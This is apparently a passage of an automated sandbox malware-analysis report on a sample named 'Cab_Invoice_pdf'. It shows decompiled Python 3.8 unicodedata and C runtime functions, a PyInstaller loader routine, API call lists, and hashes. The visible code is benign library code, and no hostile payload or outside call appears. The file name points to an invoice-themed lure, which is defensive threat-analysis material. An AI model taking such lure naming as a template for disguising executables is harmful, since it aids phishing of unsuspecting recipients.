                            • Instruction ID: 0ff0e8c5fa000a24a614515a6a43087516136ef65ca9b01f86f8a5f0fab17f5f
                            • Opcode Fuzzy Hash: 54b65913799bdf2fc4b5987ce07bc3a9d15899c30ec00fa49752aa9e9844ca41
                            • Instruction Fuzzy Hash: 6F215C71A4431967E3346AAF6C41F57BA9C9B81B3CF14063AFD20A62C4E7A1D44483EA
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6E2F41B0, Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 52COMMON
                            Download Yara Rule
                            APIs
                            • PyModule_Create2.PYTHON38(6E3F81F8,000003F5), ref: 6E2F41C5
                            • PyModule_AddStringConstant.PYTHON38(00000000,unidata_version,12.1.0), ref: 6E2F41E2
                            • PyModule_AddObject.PYTHON38(00000000,UCD,6E3F8128), ref: 6E2F41FF
                            • _PyObject_New.PYTHON38(6E3F8128), ref: 6E2F4206
                            • PyModule_AddObject.PYTHON38(00000000,ucd_3_2_0,00000000), ref: 6E2F422F
                            • PyCapsule_New.PYTHON38(6E31E0A0,unicodedata.ucnhash_CAPI,00000000), ref: 6E2F4240
                            • PyModule_AddObject.PYTHON38(00000000,ucnhash_CAPI,00000000), ref: 6E2F4254
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Module_$Object$Capsule_ConstantCreate2Object_String
                            • String ID: 12.1.0$UCD$ucd_3_2_0$ucnhash_CAPI$unicodedata.ucnhash_CAPI$unidata_version$e/n
                            • API String ID: 3760240918-3421882380
                            • Opcode ID: 8f81d0a57dccfa1986319ddd28672dce421a4a3564597558d53c03f78ff1158f
                            • Instruction ID: 6854e3db42a70e1a0dd758bc2df0eb11312d045956cb419b486b128d61701c52
                            • Opcode Fuzzy Hash: 8f81d0a57dccfa1986319ddd28672dce421a4a3564597558d53c03f78ff1158f
                            • Instruction Fuzzy Hash: CA01D8705E051AEBCA002BD5AC88F4EB66BFF42362B154064F902AA306D6B18507CFF5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6E2F2060, Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 198COMMON
                            Download Yara Rule
                            C-Code - Quality: 30%
                            			E6E2F2060(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t24;
				signed int _t27;
				signed int _t29;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t34;
				signed int _t36;
				void* _t42;
				void* _t44;
				intOrPtr _t47;
				intOrPtr _t55;
				signed int* _t56;
				intOrPtr* _t61;
				intOrPtr* _t67;
				intOrPtr* _t69;
				signed int _t81;
				signed int* _t82;
				void* _t87;
				void* _t103;

				_t24 = _a12;
				_t81 = 0;
				_t103 = _t24 - 2;
				if(_t103 < 0 || _t103 > 0) {
					__imp___PyArg_CheckPositional("normalize", _t24, 2, 2);
					_t87 = _t87 + 0x10;
					if(_t24 == 0) {
						goto L29;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t67 = _a8;
					_t55 =  *_t67;
					if(( *( *((intOrPtr*)(_t55 + 4)) + 0x54) & 0x10000000) != 0) {
						__eflags =  *(_t55 + 0x10) & 0x00000080;
						_t61 = __imp___PyUnicode_Ready;
						if(( *(_t55 + 0x10) & 0x00000080) != 0) {
							L8:
							_t56 =  *(_t67 + 4);
							_t47 =  *_t67;
							_t27 = _t56[1];
							__eflags =  *(_t27 + 0x54) & 0x10000000;
							if(( *(_t27 + 0x54) & 0x10000000) != 0) {
								__eflags = _t56[4] & 0x00000080;
								if((_t56[4] & 0x00000080) != 0) {
									L12:
									_t82 =  *(_t67 + 4);
									__eflags = _t82[2];
									if(_t82[2] == 0) {
										L24:
										 *_t82 =  *_t82 + 1;
										__eflags =  *_t82;
										return _t82;
									} else {
										_t69 = __imp___PyUnicode_EqualToASCIIId;
										_t29 =  *_t69(_t47, 0x6e3f8a28);
										__eflags = _t29;
										if(_t29 == 0) {
											_t30 =  *_t69(_t47, 0x6e3f8a34);
											__eflags = _t30;
											if(_t30 == 0) {
												_t31 =  *_t69(_t47, 0x6e3f837c);
												__eflags = _t31;
												if(_t31 == 0) {
													_t32 =  *_t69(_t47, 0x6e3f8370);
													__eflags = _t32;
													if(_t32 == 0) {
														__imp__PyErr_SetString( *__imp__PyExc_ValueError, "invalid normalization form");
														_t81 = 0;
														__eflags = 0;
														goto L27;
													} else {
														_t71 = _a4;
														_t34 = E6E2F3550(_a4, _t82, 0, 1, 1);
														__eflags = _t34;
														if(_t34 != 0) {
															return E6E2F2A70(_t47, _t71, _t82, _t71, _t82, 1);
														} else {
															goto L24;
														}
													}
												} else {
													_t73 = _a4;
													_t36 = E6E2F3550(_a4, _t82, 0, 0, 1);
													__eflags = _t36;
													if(_t36 == 0) {
														goto L24;
													} else {
														return E6E2F2A70(_t47, _t73, _t82, _t73, _t82, 0);
													}
												}
											} else {
												_t75 = _a4;
												__eflags = E6E2F3550(_a4, _t82, 1, 1, 1);
												if(__eflags == 0) {
													goto L24;
												} else {
													return E6E2F3030(_t47, _t75, _t82, __eflags, _t75, _t82, 1);
												}
											}
										} else {
											_t77 = _a4;
											__eflags = E6E2F3550(_a4, _t82, 1, 0, 1);
											if(__eflags == 0) {
												goto L24;
											} else {
												return E6E2F3030(_t47, _t77, _t82, __eflags, _t77, _t82, 0);
											}
										}
									}
								} else {
									_t42 =  *_t61(_t56);
									_t87 = _t87 + 4;
									__eflags = _t42 - 0xffffffff;
									if(_t42 == 0xffffffff) {
										L27:
										goto L28;
									} else {
										goto L12;
									}
								}
							} else {
								__imp___PyArg_BadArgument("normalize", "argument 2", "str", _t56);
								return _t81;
							}
						} else {
							_t44 =  *_t61(_t55);
							_t87 = _t87 + 4;
							__eflags = _t44 - 0xffffffff;
							if(_t44 == 0xffffffff) {
								L28:
								L29:
								return _t81;
							} else {
								_t61 = __imp___PyUnicode_Ready;
								goto L8;
							}
						}
					} else {
						__imp___PyArg_BadArgument("normalize", "argument 1", "str", _t55);
						return _t81;
					}
				}
			}


























                            0x6e2f2063
                            0x6e2f2067
                            0x6e2f2069
                            0x6e2f206c
                            0x6e2f207a
                            0x6e2f2080
                            0x6e2f2085
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x6e2f208b
                            0x6e2f208b
                            0x6e2f208c
                            0x6e2f208f
                            0x6e2f209b
                            0x6e2f20bc
                            0x6e2f20c0
                            0x6e2f20c6
                            0x6e2f20dd
                            0x6e2f20dd
                            0x6e2f20e1
                            0x6e2f20e3
                            0x6e2f20e6
                            0x6e2f20ed
                            0x6e2f210f
                            0x6e2f2113
                            0x6e2f2124
                            0x6e2f2124
                            0x6e2f2127
                            0x6e2f212b
                            0x6e2f2214
                            0x6e2f2214
                            0x6e2f2214
                            0x6e2f221c
                            0x6e2f2131
                            0x6e2f2131
                            0x6e2f213d
                            0x6e2f2142
                            0x6e2f2144
                            0x6e2f217c
                            0x6e2f2181
                            0x6e2f2183
                            0x6e2f21b7
                            0x6e2f21bc
                            0x6e2f21be
                            0x6e2f21f2
                            0x6e2f21f7
                            0x6e2f21f9
                            0x6e2f223c
                            0x6e2f2245
                            0x6e2f2245
                            0x00000000
                            0x6e2f21fb
                            0x6e2f21fb
                            0x6e2f2208
                            0x6e2f2210
                            0x6e2f2212
                            0x6e2f222f
                            0x00000000
                            0x00000000
                            0x00000000
                            0x6e2f2212
                            0x6e2f21c0
                            0x6e2f21c0
                            0x6e2f21cd
                            0x6e2f21d5
                            0x6e2f21d7
                            0x00000000
                            0x6e2f21d9
                            0x6e2f21eb
                            0x6e2f21eb
                            0x6e2f21d7
                            0x6e2f2185
                            0x6e2f2185
                            0x6e2f219a
                            0x6e2f219c
                            0x00000000
                            0x6e2f219e
                            0x6e2f21b0
                            0x6e2f21b0
                            0x6e2f219c
                            0x6e2f2146
                            0x6e2f2146
                            0x6e2f215b
                            0x6e2f215d
                            0x00000000
                            0x6e2f2163
                            0x6e2f2175
                            0x6e2f2175
                            0x6e2f215d
                            0x6e2f2144
                            0x6e2f2115
                            0x6e2f2116
                            0x6e2f2118
                            0x6e2f211b
                            0x6e2f211e
                            0x6e2f2247
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x6e2f211e
                            0x6e2f20ef
                            0x6e2f20ff
                            0x6e2f210e
                            0x6e2f210e
                            0x6e2f20c8
                            0x6e2f20c9
                            0x6e2f20cb
                            0x6e2f20ce
                            0x6e2f20d1
                            0x6e2f2248
                            0x6e2f2249
                            0x6e2f224d
                            0x6e2f20d7
                            0x6e2f20d7
                            0x00000000
                            0x6e2f20d7
                            0x6e2f20d1
                            0x6e2f209d
                            0x6e2f20ad
                            0x6e2f20bb
                            0x6e2f20bb
                            0x6e2f209b

                            APIs
                            • _PyArg_CheckPositional.PYTHON38(normalize,?,00000002,00000002), ref: 6E2F207A
                            • _PyArg_BadArgument.PYTHON38(normalize,argument 1,str), ref: 6E2F20AD
                            • _PyArg_BadArgument.PYTHON38(normalize,argument 2,str,?), ref: 6E2F20FF
                            • _PyUnicode_EqualToASCIIId.PYTHON38(?,6E3F8A28), ref: 6E2F213D
                            • _PyUnicode_EqualToASCIIId.PYTHON38(?,6E3F8A34), ref: 6E2F217C
                            • _PyUnicode_EqualToASCIIId.PYTHON38(?,6E3F837C), ref: 6E2F21B7
                              • Part of subcall function 6E2F3030: PyMem_Malloc.PYTHON38(?,?,00000000,?), ref: 6E2F30A3
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Arg_EqualUnicode_$Argument$CheckMallocMem_Positional
                            • String ID: argument 1$argument 2$invalid normalization form$normalize$str
                            • API String ID: 3425707189-4140678229
                            • Opcode ID: fbd52154e0a4bda25fe330a19fdd717aa86b8df70d609a1bf0300678541edff7
                            • Instruction ID: 780d9a25849015d9227f550fdbabf5294ef2e16ab6d4b1891f0368dc64105dd0
                            • Opcode Fuzzy Hash: fbd52154e0a4bda25fe330a19fdd717aa86b8df70d609a1bf0300678541edff7
                            • Instruction Fuzzy Hash: EA512673790219E7EA1052D87C81F9AB71BEB8167AF140125FA099B382E662D417C7E1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01313370, Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 68COMMON
                            Download Yara Rule
                            APIs
                            • htonl.WS2_32(?), ref: 01313391
                            • PyUnicode_Decode.PYTHON38(013120B9,013120BA,utf-8,strict,?,00000000,?,00000000,00000000,01312051,00000000,?,00000000,00000000), ref: 013133B8
                            • PyUnicode_FromFormat.PYTHON38(%U?%zu,00000000,56CA75C0,?,00000000,00000000,?,?,?,00000000), ref: 013133C7
                            • Py_DecRef.PYTHON38(00000000,?,00000000,00000000,?,?,?,00000000), ref: 013133D0
                            • PySys_GetObject.PYTHON38(path,?,00000000,00000000,?,?,?,00000000), ref: 013133DB
                            • Py_DecRef.PYTHON38(00000000,Installing PYZ: Could not get sys.path), ref: 013133F3
                            • PyList_Append.PYTHON38(00000000,00000000), ref: 01313400
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Unicode_$AppendDecodeFormatFromList_ObjectSys_htonl
                            • String ID: %U?%zu$Failed to append to sys.path$Installing PYZ: Could not get sys.path$path$strict$utf-8
                            • API String ID: 4195543242-2673223963
                            • Opcode ID: 08da7eadab9082369601e11e61dd1e5a11971e47bed2242a162ef8653c194c7e
                            • Instruction ID: 496f7c65bc7fced27dd958ce77e84fe30bde78c8848fef24518dbe2a0e628ded
                            • Opcode Fuzzy Hash: 08da7eadab9082369601e11e61dd1e5a11971e47bed2242a162ef8653c194c7e
                            • Instruction Fuzzy Hash: 4B115B72500201BBDB151B7ADC498577B9DBE8137EF0D4161FC06A320FEA21E55087F9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 013281FB, Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E013281FB(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x133c838) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E013209EB(_t46);
							E01327D80( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E013209EB(_t47);
							E01327E7E( *((intOrPtr*)(_t74 + 0x88)));
						}
						E013209EB( *((intOrPtr*)(_t74 + 0x7c)));
						E013209EB( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E013209EB( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E013209EB( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E013209EB( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E013209EB( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E0132836E( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x133c300) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E013209EB(_t31);
							E013209EB( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E013209EB(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E013209EB(_t74);
			}















                            0x01328203
                            0x01328207
                            0x0132820f
                            0x01328218
                            0x0132821d
                            0x01328224
                            0x0132822c
                            0x01328234
                            0x0132823f
                            0x01328245
                            0x01328246
                            0x0132824e
                            0x01328256
                            0x01328261
                            0x01328267
                            0x0132826b
                            0x01328276
                            0x0132827c
                            0x0132821d
                            0x0132827d
                            0x01328285
                            0x01328298
                            0x013282ab
                            0x013282b9
                            0x013282c4
                            0x013282c9
                            0x013282d2
                            0x013282da
                            0x013282db
                            0x013282e1
                            0x013282e4
                            0x013282e7
                            0x013282ee
                            0x013282f0
                            0x013282f4
                            0x013282fc
                            0x01328303
                            0x01328309
                            0x0132830a
                            0x0132830a
                            0x01328311
                            0x01328313
                            0x01328318
                            0x01328320
                            0x01328325
                            0x01328326
                            0x01328326
                            0x01328329
                            0x0132832c
                            0x0132832f
                            0x01328332
                            0x01328332
                            0x01328344

                            APIs
                            • ___free_lconv_mon.LIBCMT ref: 0132823F
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327D9D
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327DAF
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327DC1
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327DD3
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327DE5
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327DF7
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327E09
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327E1B
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327E2D
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327E3F
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327E51
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327E63
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327E75
                            • _free.LIBCMT ref: 01328234
                              • Part of subcall function 013209EB: RtlFreeHeap.NTDLL(00000000,00000000,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?), ref: 01320A01
                              • Part of subcall function 013209EB: GetLastError.KERNEL32(?,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?,?), ref: 01320A13
                            • _free.LIBCMT ref: 01328256
                            • _free.LIBCMT ref: 0132826B
                            • _free.LIBCMT ref: 01328276
                            • _free.LIBCMT ref: 01328298
                            • _free.LIBCMT ref: 013282AB
                            • _free.LIBCMT ref: 013282B9
                            • _free.LIBCMT ref: 013282C4
                            • _free.LIBCMT ref: 013282FC
                            • _free.LIBCMT ref: 01328303
                            • _free.LIBCMT ref: 01328320
                            • _free.LIBCMT ref: 01328338
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                            • String ID:
                            • API String ID: 161543041-0
                            • Opcode ID: db136d435113531aa93aaa6f35193faf4e2e816766347699b89fb456f4eea32c
                            • Instruction ID: 53c8aa4b8fa531ebe811bd7292aeb80c714b057b3129855e0c54e41c5e2a0d8c
                            • Opcode Fuzzy Hash: db136d435113531aa93aaa6f35193faf4e2e816766347699b89fb456f4eea32c
                            • Instruction Fuzzy Hash: B8317C316007229FFB25BA7ED845B5B77F8EF01618F10495AE59AD71A0DF31AC44CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6E2F1C60, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 182COMMON
                            Download Yara Rule
                            APIs
                            • _PyArg_BadArgument.PYTHON38(decomposition,argument,a unicode character,?), ref: 6E2F1C97
                            • _PyUnicode_Ready.PYTHON38(?), ref: 6E2F1CB9
                            • PyUnicode_FromString.PYTHON38(6E2F61FB), ref: 6E2F1D64
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Unicode_$Arg_ArgumentFromReadyString
                            • String ID: $%04X$a unicode character$argument$decomposition
                            • API String ID: 3000140846-4056541097
                            • Opcode ID: 0055669e2f3cbbc99d8cb890e2670bef3d51efae7b431854b5e59f67ca6828c0
                            • Instruction ID: bd101712fbc24679c21b28d3d470ae206d3aeed765917571c0a001cb30f14097
                            • Opcode Fuzzy Hash: 0055669e2f3cbbc99d8cb890e2670bef3d51efae7b431854b5e59f67ca6828c0
                            • Instruction Fuzzy Hash: D9517AB2AA052EDBDB108EACCC41A99B3F6DF46311F440398ECD6D7242D731D98AC790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6E2F1480, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 163COMMON
                            Download Yara Rule
                            APIs
                            • _PyArg_CheckPositional.PYTHON38(numeric,?,00000001,00000002), ref: 6E2F14A5
                            • _PyArg_BadArgument.PYTHON38(numeric,argument 1,a unicode character,?), ref: 6E2F14D3
                            • _PyUnicode_Ready.PYTHON38 ref: 6E2F14EC
                            • _PyUnicode_ToNumeric.PYTHON38(00000080), ref: 6E2F15BA
                            • PyErr_SetString.PYTHON38(6E79ED94,not a numeric character), ref: 6E2F15E4
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Arg_Unicode_$ArgumentCheckErr_NumericPositionalReadyString
                            • String ID: a unicode character$argument 1$not a numeric character$numeric
                            • API String ID: 3535500773-2317633676
                            • Opcode ID: 2cf6cb8b3e3c0878b664c785967580174026bf49f5209338722a329f553646cc
                            • Instruction ID: c71a3360db30dfa88cefd2aa33a0b13bb4bc2ae8af8d8f50e438ed9a53d77b2f
                            • Opcode Fuzzy Hash: 2cf6cb8b3e3c0878b664c785967580174026bf49f5209338722a329f553646cc
                            • Instruction Fuzzy Hash: 0A415CF2BA410EDFDB104BA9D886B15B7E2EB41327B8442A5F916CB243D725C49B87D0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6E2F11B0, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 155COMMON
                            Download Yara Rule
                            APIs
                            • _PyArg_CheckPositional.PYTHON38(decimal,?,00000001,00000002), ref: 6E2F11CE
                            • _PyUnicode_Ready.PYTHON38 ref: 6E2F11FB
                            • _PyArg_BadArgument.PYTHON38(decimal,argument 1,a unicode character,?), ref: 6E2F1220
                            • _PyUnicode_ToDecimalDigit.PYTHON38(00000080), ref: 6E2F12DE
                            • PyErr_SetString.PYTHON38(6E79ED94,not a decimal), ref: 6E2F12FB
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Arg_Unicode_$ArgumentCheckDecimalDigitErr_PositionalReadyString
                            • String ID: a unicode character$argument 1$decimal$not a decimal
                            • API String ID: 1715956419-3860666600
                            • Opcode ID: da0d386d7b2f2c8fec468f43cdb530e3bd9c85fa53e85ebbbe61fc99fe7e14a4
                            • Instruction ID: 9a944408227747b72276a95380f4cb1931baf76176dba9783632d1d899576b45
                            • Opcode Fuzzy Hash: da0d386d7b2f2c8fec468f43cdb530e3bd9c85fa53e85ebbbe61fc99fe7e14a4
                            • Instruction Fuzzy Hash: 8F414CB2BE412ADFF7004BE9DC81B55B3E3EB4232AB584165E815CB283D731D48B8790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6E2F1330, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 139COMMON
                            Download Yara Rule
                            APIs
                            • _PyArg_CheckPositional.PYTHON38(digit,?,00000001,00000002), ref: 6E2F134E
                            • _PyUnicode_Ready.PYTHON38 ref: 6E2F137B
                            • _PyArg_BadArgument.PYTHON38(digit,argument 1,a unicode character,?), ref: 6E2F13A0
                            • _PyUnicode_ToDigit.PYTHON38(?), ref: 6E2F1433
                            • PyErr_SetString.PYTHON38(6E79ED94,not a digit), ref: 6E2F1450
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Arg_Unicode_$ArgumentCheckDigitErr_PositionalReadyString
                            • String ID: a unicode character$argument 1$digit$not a digit
                            • API String ID: 3305933226-4278345224
